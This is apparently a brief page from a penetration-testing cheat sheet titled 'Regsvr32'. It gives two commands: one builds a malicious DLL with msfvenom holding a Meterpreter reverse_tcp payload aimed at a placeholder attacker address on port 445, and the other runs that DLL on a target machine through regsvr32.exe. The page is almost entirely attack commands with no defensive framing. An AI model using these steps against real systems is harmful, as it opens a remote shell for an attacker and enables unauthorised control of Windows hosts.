githubEdit

Regsvr32

1) Create a malicious .dll file

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=445 -f dll -a x86 > Shell.dll 

2) Upload the file to target machine, then execute

regsvr32.exe c:\windows\temp\shell.dll

Last updated